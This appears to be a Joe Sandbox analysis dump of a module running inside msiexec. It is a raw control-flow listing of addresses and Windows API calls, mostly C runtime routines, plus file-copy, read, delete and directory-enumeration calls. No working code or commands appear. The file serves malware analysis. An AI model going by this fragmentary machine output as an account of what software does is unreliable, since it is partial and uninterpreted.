5840->5841 5840->5843 5842 228e1e3f lstrlenW 5841->5842 5841->5843 5842->5843 5843->5818 5845 228e120e ___scrt_fastfail 5844->5845 5846 228e1e89 5 API calls 5845->5846 5847 228e1220 GetFileAttributesW 5846->5847 5848 228e1246 5847->5848 5849 228e1235 5847->5849 5850 228e1e89 5 API calls 5848->5850 5849->5848 5852 228e173a 35 API calls 5849->5852 5851 228e1258 5850->5851 5853 228e10f1 56 API calls 5851->5853 5852->5848 5854 228e126d 5853->5854 5855 228e1e89 5 API calls 5854->5855 5856 228e127f ___scrt_fastfail 5855->5856 5857 228e10f1 56 API calls 5856->5857 5858 228e12e6 5857->5858 5858->5823 5860 228e1cf1 ___scrt_fastfail 5859->5860 5861 228e1d0f CopyFileW CreateFileW 5860->5861 5862 228e1d44 DeleteFileW 5861->5862 5863 228e1d55 GetFileSize 5861->5863 5868 228e1808 5862->5868 5864 228e1ede 22 API calls 5863->5864 5865 228e1d66 ReadFile 5864->5865 5866 228e1d7d CloseHandle DeleteFileW 5865->5866 5867 228e1d94 CloseHandle DeleteFileW 5865->5867 5866->5868 5867->5868 5868->5835 5869 228e1ede 5868->5869 5871 228e222f 5869->5871 5872 228e224e 5871->5872 5875 228e2250 5871->5875 5887 228e474f 5871->5887 5892 228e47e5 5871->5892 5872->5837 5874 228e2908 5876 228e35d2 __CxxThrowException@8 RaiseException 5874->5876 5875->5874 5899 228e35d2 5875->5899 5877 228e2925 5876->5877 5877->5837 5880 228e160c _strcat _strlen 5879->5880 5881 228e163c lstrlenW 5880->5881 5987 228e1c9d 5881->5987 5883 228e1655 lstrcatW lstrlenW 5884 228e1678 5883->5884 5885 228e167e lstrcatW 5884->5885 5886 228e1693 ___scrt_fastfail 5884->5886 5885->5886 5886->5837 5902 228e4793 5887->5902 5890 228e478f 5890->5871 5891 228e4765 5908 228e2ada 5891->5908 5897 228e56d0 _abort 5892->5897 5893 228e570e 5921 228e6368 5893->5921 5894 228e56f9 RtlAllocateHeap 5896 228e570c 5894->5896 5894->5897 5896->5871 5897->5893 5897->5894 5898 228e474f _abort 7 API calls 5897->5898 5898->5897 5900 228e35f2 RaiseException 5899->5900 5900->5874 5903 228e479f ___DestructExceptionObject 5902->5903 5915 228e5671 RtlEnterCriticalSection 5903->5915 5905 228e47aa 5916 228e47dc 5905->5916 5907 228e47d1 _abort 5907->5891 5909 228e2ae5 IsProcessorFeaturePresent 5908->5909 5910 228e2ae3 5908->5910 5912 228e2b58 5909->5912 5910->5890 5920 228e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5912->5920 5914 228e2c3b 5914->5890 5915->5905 5919 228e56b9 RtlLeaveCriticalSection 5916->5919 5918 228e47e3 5918->5907 5919->5918 5920->5914 5924 228e5b7a GetLastError 5921->5924 5925 228e5b99 5924->5925 5926 228e5b93 5924->5926 5930 228e5bf0 SetLastError 5925->5930 5950 228e637b 5925->5950 5943 228e5e08 5926->5943 5932 228e5bf9 5930->5932 5931 228e5bb3 5957 228e571e 5931->5957 5932->5896 5936 228e5bb9 5938 228e5be7 SetLastError 5936->5938 5937 228e5bcf 5970 228e593c 5937->5970 5938->5932 5941 228e571e _free 17 API calls 5942 228e5be0 5941->5942 5942->5930 5942->5938 5975 228e5c45 5943->5975 5945 228e5e2f 5946 228e5e47 TlsGetValue 5945->5946 5947 228e5e3b 5945->5947 5946->5947 5948 228e2ada _ValidateLocalCookies 5 API calls 5947->5948 5949 228e5e58 5948->5949 5949->5925 5955 228e6388 _abort 5950->5955 5951 228e63c8 5953 228e6368 _free 19 API calls 5951->5953 5952 228e63b3 RtlAllocateHeap 5954 228e5bab 5952->5954 5952->5955 5953->5954 5954->5931 5963 228e5e5e 5954->5963 5955->5951 5955->5952 5956 228e474f _abort 7 API calls 5955->5956 5956->5955 5958 228e5729 HeapFree 5957->5958 5959 228e5752 _free 5957->5959 5958->5959 5960 228e573e 5958->5960 5959->5936 5961 228e6368 _free 18 API calls 5960->5961 5962 228e5744 GetLastError 5961->5962 5962->5959 5964 228e5c45 _abort 5 API calls 5963->5964 5965 228e5e85 5964->5965 5966 228e5ea0 TlsSetValue 5965->5966 5967 228e5e94 5965->5967 5966->5967 5968 228e2ada _ValidateLocalCookies 5 API calls 5967->5968 5969 228e5bc8 5968->5969 5969->5931 5969->5937 5981 228e5914 5970->5981 5976 228e5c71 5975->5976 5980 228e5c75 __crt_fast_encode_pointer 5975->5980 5977 228e5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5976->5977 5979 228e5c95 5976->5979 5976->5980 5977->5976 5978 228e5ca1 GetProcAddress 5978->5980 5979->5978 5979->5980 5980->5945 5982 228e5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5981->5982 5983 228e5938 5982->5983 5984 228e58c4 5983->5984 5985 228e5758 _abort 20 API calls 5984->5985 5986 228e58e8 5985->5986 5986->5941 5988 228e1ca6 _strlen 5987->5988 5988->5883 6697 228e20db 6699 228e20e7 ___DestructExceptionObject 6697->6699 6698 228e20f6 6699->6698 6700 228e2110 dllmain_raw 6699->6700 6702 228e210b 6699->6702 6700->6698 6701 228e212a 6700->6701 6710 228e1eec 6701->6710 6702->6698 6704 228e2177 6702->6704 6708 228e1eec 31 API calls 6702->6708 6704->6698 6705 228e1eec 31 API calls 6704->6705 6706 228e218a 6705->6706 6706->6698 6707 228e2193 dllmain_raw 6706->6707 6707->6698 6709 228e216d dllmain_raw 6708->6709 6709->6704 6711 228e1f2a dllmain_crt_process_detach 6710->6711 6712 228e1ef7 6710->6712 6715 228e1f06 6711->6715 6713 228e1f1c dllmain_crt_process_attach 6712->6713 6714 228e1efc 6712->6714 6713->6715 6716 228e1f12 6714->6716 6717 228e1f01 6714->6717 6715->6702 6725 228e23ec 6716->6725 6717->6715 6720 228e240b 6717->6720 6733 228e53e5 6720->6733 6844 228e3513 6725->6844 6728 228e23f5 6728->6715 6731 228e2408 6731->6715 6732 228e351e 7 API calls 6732->6728 6739 228e5aca 6733->6739 6736 228e351e 6815 228e3820 6736->6815 6738 228e2415 6738->6715 6740 228e5ad4 6739->6740 6741 228e2410 6739->6741 6742 228e5e08 _abort 11 API calls 6740->6742 6741->6736 6743 228e5adb 6742->6743 6743->6741 6744 228e5e5e _abort 11 API calls 6743->6744 6745 228e5aee 6744->6745 6747 228e59b5 6745->6747 6748 228e59c0 6747->6748 6752 228e59d0 6747->6752 6753 228e59d6 6748->6753 6751 228e571e _free 20 API calls 6751->6752 6752->6741 6754 228e59e9 6753->6754 6755 228e59ef 6753->6755 6756 228e571e _free 20 API calls 6754->6756 6757 228e571e _free 20 API calls 6755->6757 6756->6755 6758 228e59fb 6757->6758 6759 228e571e _free 20 API calls 6758->6759 6760 228e5a06 6759->6760 6761 228e571e _free 20 API calls 6760->6761 6762 228e5a11 6761->6762 6763 228e571e _free 20 API calls 6762->6763 6764 228e5a1c 6763->6764 6765 228e571e _free 20 API calls 6764->6765 6766 228e5a27 6765->6766 6767 228e571e _free 20 API calls 6766->6767 6768 228e5a32 6767->6768 6769 228e571e _free 20 API calls 6768->6769 6770 228e5a3d 6769->6770 6771 228e571e _free 20 API calls 6770->6771 6772 228e5a48 6771->6772 6773 228e571e _free 20 API calls 6772->6773 6774 228e5a56 6773->6774 6779 228e589c 6774->6779 6785 228e57a8 6779->6785 6781 228e58c0 6782 228e58ec 6781->6782 6798 228e5809 6782->6798 6784 228e5910 6784->6751 6786 228e57b4 ___DestructExceptionObject 6785->6786 6793 228e5671 RtlEnterCriticalSection 6786->6793 6788 228e57be 6791 228e571e _free 20 API calls 6788->6791 6792 228e57e8 6788->6792 6790 228e57f5 _abort 6790->6781 6791->6792 6794 228e57fd 6792->6794 6793->6788 6797 228e56b9 RtlLeaveCriticalSection 6794->6797 6796 228e5807 6796->6790 6797->6796 6799 228e5815 ___DestructExceptionObject 6798->6799 6806 228e5671 RtlEnterCriticalSection 6799->6806 6801 228e581f 6807 228e5a7f 6801->6807 6803 228e5832 6811 228e5848 6803->6811 6805 228e5840 _abort 6805->6784 6806->6801 6808 228e5a8e __fassign 6807->6808 6810 228e5ab5 __fassign 6807->6810 6809 228e7cc2 __fassign 20 API calls 6808->6809 6808->6810 6809->6810 6810->6803 6814 228e56b9 RtlLeaveCriticalSection 6811->6814 6813 228e5852 6813->6805 6814->6813 6816 228e382d 6815->6816 6820 228e384b ___vcrt_freefls@4 6815->6820 6817 228e383b 6816->6817 6821 228e3b67 6816->6821 6826 228e3ba2 6817->6826 6820->6738 6831 228e3a82 6821->6831 6823 228e3b81 6824 228e3b99 TlsGetValue 6823->6824 6825 228e3b8d 6823->6825 6824->6825 6825->6817 6827 228e3a82 try_get_function 5 API calls 6826->6827 6828 228e3bbc 6827->6828 6829 228e3bd7 TlsSetValue 6828->6829 6830 228e3bcb 6828->6830 6829->6830 6830->6820 6832 228e3aaa 6831->6832 6836 228e3aa6 __crt_fast_encode_pointer 6831->6836 6832->6836 6837 228e39be 6832->6837 6835 228e3ac4 GetProcAddress 6835->6836 6836->6823 6840 228e39cd try_get_first_available_module 6837->6840 6838 228e3a77 6838->6835 6838->6836 6839 228e39ea LoadLibraryExW 6839->6840 6841 228e3a05 GetLastError 6839->6841 6840->6838 6840->6839 6842 228e3a60 FreeLibrary 6840->6842 6843 228e3a38 LoadLibraryExW 6840->6843 6841->6840 6842->6840 6843->6840 6850 228e3856 6844->6850 6846 228e23f1 6846->6728 6847 228e53da 6846->6847 6848 228e5b7a __dosmaperr 20 API calls 6847->6848 6849 228e23fd 6848->6849 6849->6731 6849->6732 6851 228e385f 6850->6851 6852 228e3862 GetLastError 6850->6852 6851->6846 6853 228e3b67 ___vcrt_FlsGetValue 6 API calls 6852->6853 6854 228e3877 6853->6854 6855 228e38dc SetLastError 6854->6855 6856 228e3ba2 ___vcrt_FlsSetValue 6 API calls 6854->6856 6861 228e3896 6854->6861 6855->6846 6857 228e3890 6856->6857 6858 228e38b8 6857->6858 6860 228e3ba2 ___vcrt_FlsSetValue 6 API calls 6857->6860 6857->6861 6859 228e3ba2 ___vcrt_FlsSetValue 6 API calls 6858->6859 6858->6861 6859->6861 6860->6858 6861->6855 7095 228e2418 7096 228e2420 ___scrt_release_startup_lock 7095->7096 7099 228e47f5 7096->7099 7098 228e2448 7100 228e4808 7099->7100 7101 228e4804 7099->7101 7104 228e4815 7100->7104 7101->7098 7105 228e5b7a __dosmaperr 20 API calls 7104->7105 7108 228e482c 7105->7108 7106 228e2ada _ValidateLocalCookies 5 API calls 7107 228e4811 7106->7107 7107->7098 7108->7106 6862 228e4ed7 6863 228e6d60 51 API calls 6862->6863 6864 228e4ee9 6863->6864 6873 228e7153 GetEnvironmentStringsW 6864->6873 6867 228e4ef4 6869 228e571e _free 20 API calls 6867->6869 6870 228e4f29 6869->6870 6871 228e4eff 6872 228e571e _free 20 API calls 6871->6872 6872->6867 6874 228e716a 6873->6874 6884 228e71bd 6873->6884 6877 228e7170 WideCharToMultiByte 6874->6877 6875 228e4eee 6875->6867 6885 228e4f2f 6875->6885 6876 228e71c6 FreeEnvironmentStringsW 6876->6875 6878 228e718c 6877->6878 6877->6884 6879 228e56d0 21 API calls 6878->6879 6880 228e7192 6879->6880 6881 228e7199 WideCharToMultiByte 6880->6881 6882 228e71af 6880->6882 6881->6882 6883 228e571e _free 20 API calls 6882->6883 6883->6884 6884->6875 6884->6876 6886 228e4f44 6885->6886 6887 228e637b _abort 20 API calls 6886->6887 6897 228e4f6b 6887->6897 6888 228e4fcf 6889 228e571e _free 20 API calls 6888->6889 6890 228e4fe9 6889->6890 6890->6871 6891 228e637b _abort 20 API calls 6891->6897 6892 228e4fd1 6894 228e5000 20 API calls 6892->6894 6895 228e4fd7 6894->6895 6896 228e571e _free 20 API calls 6895->6896 6896->6888 6897->6888 6897->6891 6897->6892 6898 228e4ff3 6897->6898 6900 228e571e _free 20 API calls 6897->6900 6902 228e544d 6897->6902 6899 228e62bc _abort 11 API calls 6898->6899 6901 228e4fff 6899->6901 6900->6897 6903 228e545a 6902->6903 6904 228e5468 6902->6904 6903->6904 6908 228e547f 6903->6908 6905 228e6368 _free 20 API calls 6904->6905 6906 228e5470 6905->6906 6907 228e62ac _abort 26 API calls 6906->6907 6909 228e547a 6907->6909 6908->6909 6910 228e6368 _free 20 API calls 6908->6910 6909->6897 6910->6906 6911 228e73d5 6912 228e73e1 ___DestructExceptionObject 6911->6912 6923 228e5671 RtlEnterCriticalSection 6912->6923 6914 228e73e8 6924 228e8be3 6914->6924 6916 228e73f7 6917 228e7406 6916->6917 6937 228e7269 GetStartupInfoW 6916->6937 6948 228e7422 6917->6948 6921 228e7417 _abort 6923->6914 6925 228e8bef ___DestructExceptionObject 6924->6925 6926 228e8bfc 6925->6926 6927 228e8c13 6925->6927 6929 228e6368 _free 20 API calls 6926->6929 6951 228e5671 RtlEnterCriticalSection 6927->6951 6930 228e8c01 6929->6930 6931 228e62ac _abort 26 API calls 6930->6931 6933 228e8c0b _abort 6931->6933 6932 228e8c4b 6959 228e8c72 6932->6959 6933->6916 6936 228e8c1f 6936->6932 6952 228e8b34 6936->6952 6938 228e7318 6937->6938 6939 228e7286 6937->6939 6943 228e731f 6938->6943 6939->6938 6940 228e8be3 27 API calls 6939->6940 6941 228e72af 6940->6941 6941->6938 6942 228e72dd GetFileType 6941->6942 6942->6941 6945 228e7326 6943->6945 6944 228e7369 GetStdHandle 6944->6945 6945->6944 6946 228e73d1 6945->6946 6947 228e737c GetFileType 6945->6947 6946->6917 6947->6945 6963 228e56b9 RtlLeaveCriticalSection 6948->6963 6950 228e7429 6950->6921 6951->6936 6953 228e637b _abort 20 API calls 6952->6953 6958 228e8b46 6953->6958 6954 228e8b53 6955 228e571e _free 20 API calls 6954->6955 6956 228e8ba5 6955->6956 6956->6936 6957 228e5eb7 11 API calls 6957->6958 6958->6954 6958->6957 6962 228e56b9 RtlLeaveCriticalSection 6959->6962 6961 228e8c79 6961->6933 6962->6961 6963->6950 6544 228e3c90 RtlUnwind 6964 228e36d0 6965 228e36e2 6964->6965 6967 228e36f0 @_EH4_CallFilterFunc@8 6964->6967 6966 228e2ada _ValidateLocalCookies 5 API calls 6965->6966 6966->6967 7705 228e5351 7706 228e5360 7705->7706 7710 228e5374 7705->7710 7708 228e571e _free 20 API calls 7706->7708 7706->7710 7707 228e571e _free 20 API calls 7709 228e5386 7707->7709 7708->7710 7711 228e571e _free 20 API calls 7709->7711 7710->7707 7712 228e5399 7711->7712 7713 228e571e _free 20 API calls 7712->7713 7714 228e53aa 7713->7714 7715 228e571e _free 20 API calls 7714->7715 7716 228e53bb 7715->7716 7717 228e506f 7718 228e5081 7717->7718 7720 228e5087 7717->7720 7719 228e5000 20 API calls 7718->7719 7719->7720 6545 228e60ac 6546 228e60dd 6545->6546 6547 228e60b7 6545->6547 6547->6546 6548 228e60c7 FreeLibrary 6547->6548 6548->6547 7109 228e742b 7110 228e7430 7109->7110 7112 228e7453 7110->7112 7113 228e8bae 7110->7113 7114 228e8bbb 7113->7114 7115 228e8bdd 7113->7115 7116 228e8bc9 RtlDeleteCriticalSection 7114->7116 7117 228e8bd7 7114->7117 7115->7110 7116->7116 7116->7117 7118 228e571e _free 20 API calls 7117->7118 7118->7115 7721 228eac6b 7722 228eac84 __startOneArgErrorHandling 7721->7722 7724 228eacad __startOneArgErrorHandling 7722->7724 7725 228eb2f0 7722->7725 7726 228eb329 __startOneArgErrorHandling 7725->7726 7727 228eb5c1 __raise_exc RaiseException 7726->7727 7728 228eb350 __startOneArgErrorHandling 7726->7728 7727->7728 7729 228eb393 7728->7729 7730 228eb36e 7728->7730 7731 228eb8b2 __startOneArgErrorHandling 20 API calls 7729->7731 7736 228eb8e1 7730->7736 7733 228eb38e __startOneArgErrorHandling 7731->7733 7734 228e2ada _ValidateLocalCookies 5 API calls 7733->7734 7735 228eb3b7 7734->7735 7735->7724 7737 228eb8f0 7736->7737 7738 228eb90f __startOneArgErrorHandling 7737->7738 7739 228eb964 __startOneArgErrorHandling 7737->7739 7740 228e78a3 __startOneArgErrorHandling 5 API calls 7738->7740 7741 228eb8b2 __startOneArgErrorHandling 20 API calls 7739->7741 7742 228eb950 7740->7742 7744 228eb95d 7741->7744 7743 228eb8b2 __startOneArgErrorHandling 20 API calls 7742->7743 7742->7744 7743->7744 7744->7733 6549 228ec7a7 6550 228ec7be 6549->6550 6551 228ec80d 6549->6551 6550->6551 6558 228ec7e6 GetModuleHandleA 6550->6558 6552 228ec835 GetModuleHandleA 6551->6552 6553 228ec872 6551->6553 6556 228ec85f GetProcAddress 6551->6556 6552->6551 6556->6551 6559 228ec7ef 6558->6559 6565 228ec80d 6558->6565 6567 228ec803 GetProcAddress 6559->6567 6562 228ec835 GetModuleHandleA 6562->6565 6563 228ec872 6565->6562 6565->6563 6566 228ec85f GetProcAddress 6565->6566 6566->6565 6568 228ec80d 6567->6568 6569 228ec835 GetModuleHandleA 6568->6569 6570 228ec872 6568->6570 6571 228ec85f GetProcAddress 6568->6571 6569->6568 6571->6568 6572 228e81a0 6573 228e81d9 6572->6573 6574 228e81dd 6573->6574 6585 228e8205 6573->6585 6575 228e6368 _free 20 API calls 6574->6575 6576 228e81e2 6575->6576 6578 228e62ac _abort 26 API calls 6576->6578 6577 228e8529 6579 228e2ada _ValidateLocalCookies 5 API calls 6577->6579 6580 228e81ed 6578->6580 6581 228e8536 6579->6581 6582 228e2ada _ValidateLocalCookies 5 API calls 6580->6582 6583 228e81f9 6582->6583 6585->6577 6586 228e80c0 6585->6586 6589 228e80db 6586->6589 6587 228e2ada _ValidateLocalCookies 5 API calls 6588 228e8152 6587->6588 6588->6585 6589->6587 6968 228ea1e0 6971 228ea1fe 6968->6971 6970 228ea1f6 6975 228ea203 6971->6975 6974 228ea298 6974->6970 6975->6974 6976 228eaa53 6975->6976 6977 228eaa70 RtlDecodePointer 6976->6977 6978 228eaa80 6976->6978 6977->6978 6979 228eab0d 6978->6979 6982 228eab02 6978->6982 6984 228eaab7 6978->6984 6979->6982 6983 228e6368 _free 20 API calls 6979->6983 6980 228e2ada _ValidateLocalCookies 5 API calls 6981 228ea42f 6980->6981 6981->6970 6982->6980 6983->6982 6984->6982 6985 228e6368 _free 20 API calls 6984->6985 6985->6982 7745 228e7260 GetStartupInfoW 7746 228e7286 7745->7746 7748 228e7318 7745->7748 7747 228e8be3 27 API calls 7746->7747 7746->7748 7749 228e72af 7747->7749 7749->7748 7750 228e72dd GetFileType 7749->7750 7750->7749 6590 228e21a1 ___scrt_dllmain_exception_filter 7751 228e9d61 7752 228e9d81 7751->7752 7755 228e9db8 7752->7755 7754 228e9dab 7756 228e9dbf 7755->7756 7757 228e9ddf 7756->7757 7758 228e9e20 7756->7758 7759 228ea90e 7757->7759 7762 228eaa17 21 API calls 7757->7762 7758->7759 7760 228eaa17 21 API calls 7758->7760 7759->7754 7761 228e9e6e 7760->7761 7761->7754 7763 228ea93e 7762->7763 7763->7754 6591 228e67bf 6596 228e67f4 6591->6596 6594 228e67db 6595 228e571e _free 20 API calls 6595->6594 6597 228e6806 6596->6597 6606 228e67cd 6596->6606 6598 228e680b 6597->6598 6599 228e6836 6597->6599 6600 228e637b _abort 20 API calls 6598->6600 6599->6606 6607 228e71d6 6599->6607 6602 228e6814 6600->6602 6603 228e571e _free 20 API calls 6602->6603 6603->6606 6604 228e6851 6605 228e571e _free 20 API calls 6604->6605 6605->6606 6606->6594 6606->6595 6608 228e71e1 6607->6608 6609 228e7209 6608->6609 6611 228e71fa 6608->6611 6610 228e7218 6609->6610 6616 228e8a98 6609->6616 6623 228e8acb 6610->6623 6612 228e6368 _free 20 API calls 6611->6612 6614 228e71ff ___scrt_fastfail 6612->6614 6614->6604 6617 228e8ab8 RtlSizeHeap 6616->6617 6618 228e8aa3 6616->6618 6617->6610 6619 228e6368 _free 20 API calls 6618->6619 6620 228e8aa8 6619->6620 6621 228e62ac _abort 26 API calls 6620->6621 6622 228e8ab3 6621->6622 6622->6610 6624 228e8ad8 6623->6624 6625 228e8ae3 6623->6625 6626 228e56d0 21 API calls 6624->6626 6627 228e8aeb 6625->6627 6633 228e8af4 _abort 6625->6633 6632 228e8ae0 6626->6632 6630 228e571e _free 20 API calls 6627->6630 6628 228e8b1e RtlReAllocateHeap 6628->6632 6628->6633 6629 228e8af9 6631 228e6368 _free 20 API calls 6629->6631 6630->6632 6631->6632 6632->6614 6633->6628 6633->6629 6634 228e474f _abort 7 API calls 6633->6634 6634->6633 6986 228e5bff 6994 228e5d5c 6986->6994 6989 228e5c13 6990 228e5b7a __dosmaperr 20 API calls 6991 228e5c1b 6990->6991 6992 228e5c28 6991->6992 7001 228e5c2b 6991->7001 6995 228e5c45 _abort 5 API calls 6994->6995 6996 228e5d83 6995->6996 6997 228e5d9b TlsAlloc 6996->6997 7000 228e5d8c 6996->7000 6997->7000 6998 228e2ada _ValidateLocalCookies 5 API calls 6999 228e5c09 6998->6999 6999->6989 6999->6990 7000->6998 7002 228e5c35 7001->7002 7003 228e5c3b 7001->7003 7005 228e5db2 7002->7005 7003->6989 7006 228e5c45 _abort 5 API calls 7005->7006 7007 228e5dd9 7006->7007 7008 228e5df1 TlsFree 7007->7008 7009 228e5de5 7007->7009 7008->7009 7010 228e2ada _ValidateLocalCookies 5 API calls 7009->7010 7011 228e5e02 7010->7011 7011->7003 7119 228e1f3f 7120 228e1f4b ___DestructExceptionObject 7119->7120 7137 228e247c 7120->7137 7122 228e1f52 7123 228e1f7c 7122->7123 7124 228e2041 7122->7124 7131 228e1f57 ___scrt_is_nonwritable_in_current_image 7122->7131 7148 228e23de 7123->7148 7160 228e2639 IsProcessorFeaturePresent 7124->7160 7127 228e2048 7128 228e1f8b __RTC_Initialize 7128->7131 7151 228e22fc RtlInitializeSListHead 7128->7151 7130 228e1f99 ___scrt_initialize_default_local_stdio_options 7152 228e46c5 7130->7152 7135 228e1fb8 7135->7131 7136 228e4669 _abort 5 API calls 7135->7136 7136->7131 7138 228e2485 7137->7138 7164 228e2933 IsProcessorFeaturePresent 7138->7164 7142 228e2496 7143 228e249a 7142->7143 7175 228e53c8 7142->7175 7143->7122 7146 228e24b1 7146->7122 7231 228e24b5 7148->7231 7150 228e23e5 7150->7128 7151->7130 7153 228e46dc 7152->7153 7154 228e2ada _ValidateLocalCookies 5 API calls 7153->7154 7155 228e1fad 7154->7155 7155->7131 7156 228e23b3 7155->7156 7157 228e23b8 ___scrt_release_startup_lock 7156->7157 7158 228e2933 ___isa_available_init IsProcessorFeaturePresent 7157->7158 7159 228e23c1 7157->7159 7158->7159 7159->7135 7161 228e264e ___scrt_fastfail 7160->7161 7162 228e26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7161->7162 7163 228e2744 ___scrt_fastfail 7162->7163 7163->7127 7165 228e2491 7164->7165 7166 228e34ea 7165->7166 7167 228e34ef ___vcrt_initialize_winapi_thunks 7166->7167 7186 228e3936 7167->7186 7170 228e34fd 7170->7142 7172 228e3505 7173 228e3510 7172->7173 7200 228e3972 7172->7200 7173->7142 7223 228e7457 7175->7223 7178 228e3529 7179 228e3543 7178->7179 7180 228e3532 7178->7180 7179->7143 7181 228e391b ___vcrt_uninitialize_ptd 6 API calls 7180->7181 7182 228e3537 7181->7182 7183 228e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7182->7183 7184 228e353c 7183->7184 7227 228e3c50 7184->7227 7187 228e393f 7186->7187 7189 228e3968 7187->7189 7191 228e34f9 7187->7191 7204 228e3be0 7187->7204 7190 228e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7189->7190 7190->7191 7191->7170 7192 228e38e8 7191->7192 7209 228e3af1 7192->7209 7195 228e3ba2 ___vcrt_FlsSetValue 6 API calls 7196 228e390b 7195->7196 7197 228e3918 7196->7197 7214 228e391b 7196->7214 7197->7172 7199 228e38fd 7199->7172 7201 228e397d 7200->7201 7203 228e399c 7200->7203 7202 228e3987 RtlDeleteCriticalSection 7201->7202 7202->7202 7202->7203 7203->7170 7205 228e3a82 try_get_function 5 API calls 7204->7205 7206 228e3bfa 7205->7206 7207 228e3c18 InitializeCriticalSectionAndSpinCount 7206->7207 7208 228e3c03 7206->7208 7207->7208 7208->7187 7210 228e3a82 try_get_function 5 API calls 7209->7210 7211 228e3b0b 7210->7211 7212 228e3b24 TlsAlloc 7211->7212 7213 228e38f2 7211->7213 7213->7195 7213->7199 7215 228e3925 7214->7215 7216 228e392b 7214->7216 7218 228e3b2c 7215->7218 7216->7199 7219 228e3a82 try_get_function 5 API calls 7218->7219 7220 228e3b46 7219->7220 7221 228e3b5e TlsFree 7220->7221 7222 228e3b52 7220->7222 7221->7222 7222->7216 7226 228e7470 7223->7226 7224 228e2ada _ValidateLocalCookies 5 API calls 7225 228e24a3 7224->7225 7225->7146 7225->7178 7226->7224 7228 228e3c59 7227->7228 7230 228e3c7f 7227->7230 7229 228e3c69 FreeLibrary 7228->7229 7228->7230 7229->7228 7230->7179 7232 228e24c4 7231->7232 7233 228e24c8 7231->7233 7232->7150 7234 228e2639 ___scrt_fastfail 4 API calls 7233->7234 7236 228e24d5 ___scrt_release_startup_lock 7233->7236 7235 228e2559 7234->7235 7236->7150 7237 228e543d 7238 228e5440 7237->7238 7239 228e55a8 _abort 38 API calls 7238->7239 7240 228e544c 7239->7240 6635 228e3eb3 6636 228e5411 38 API calls 6635->6636 6637 228e3ebb 6636->6637 7012 228e63f0 7013 228e6400 7012->7013 7022 228e6416 7012->7022 7014 228e6368 _free 20 API calls 7013->7014 7015 228e6405 7014->7015 7016 228e62ac _abort 26 API calls 7015->7016 7018 228e640f 7016->7018 7017 228e4e76 20 API calls 7023 228e64e5 7017->7023 7019 228e6480 7019->7017 7019->7019 7021 228e64ee 7024 228e571e _free 20 API calls 7021->7024 7022->7019 7025 228e6561 7022->7025 7031 228e6580 7022->7031 7023->7021 7028 228e6573 7023->7028 7042 228e85eb 7023->7042 7024->7025 7051 228e679a 7025->7051 7029 228e62bc _abort 11 API calls 7028->7029 7030 228e657f 7029->7030 7032 228e658c 7031->7032 7032->7032 7033 228e637b _abort 20 API calls 7032->7033 7034 228e65ba 7033->7034 7035 228e85eb 26 API calls 7034->7035 7036 228e65e6 7035->7036 7037 228e62bc _abort 11 API calls 7036->7037 7038 228e6615 ___scrt_fastfail 7037->7038 7039 228e66b6 FindFirstFileExA 7038->7039 7040 228e6705 7039->7040 7041 228e6580 26 API calls 7040->7041 7045 228e853a 7042->7045 7043 228e854f 7044 228e8554 7043->7044 7046 228e6368 _free 20 API calls 7043->7046 7044->7023 7045->7043 7045->7044 7049 228e858b 7045->7049 7047 228e857a 7046->7047 7048 228e62ac _abort 26 API calls 7047->7048 7048->7044 7049->7044 7050 228e6368 _free 20 API calls 7049->7050 7050->7047 7052 228e67a4 7051->7052 7053 228e67b4 7052->7053 7054 228e571e _free 20 API calls 7052->7054 7055 228e571e _free 20 API calls 7053->7055 7054->7052 7056 228e67bb 7055->7056 7056->7018 7241 228e5630 7242 228e563b 7241->7242 7243 228e5eb7 11 API calls 7242->7243 7244 228e5664 7242->7244 7245 228e5660 7242->7245 7243->7242 7247 228e5688 7244->7247 7248 228e56b4 7247->7248 7249 228e5695 7247->7249 7248->7245 7250 228e569f RtlDeleteCriticalSection 7249->7250 7250->7248 7250->7250 7764 228e3370 7775 228e3330 7764->7775 7776 228e334f 7775->7776 7777 228e3342 7775->7777 7778 228e2ada _ValidateLocalCookies 5 API calls 7777->7778 7778->7776 7779 228e9e71 7780 228e9e95 7779->7780 7781 228e9eae 7780->7781 7784 228eac6b __startOneArgErrorHandling 7780->7784 7782 228eaa53 21 API calls 7781->7782 7785 228e9ef8 7781->7785 7782->7785 7783 228eacad __startOneArgErrorHandling 7784->7783 7786 228eb2f0 21 API calls 7784->7786 7786->7783

                                                                                                        Executed Functions

                                                                                                        Function 228E10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 228E1137
                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1151
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E115C
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E116D
                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E117C
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1193
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 228E11D0
                                                                                                        • FindClose.KERNEL32(00000000), ref: 228E11DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1083526818-0
                                                                                                        • Opcode ID: a84c53ce2986e70f438908003225df536cf7bc40b61c9246bfc1d54d5ecd16f7
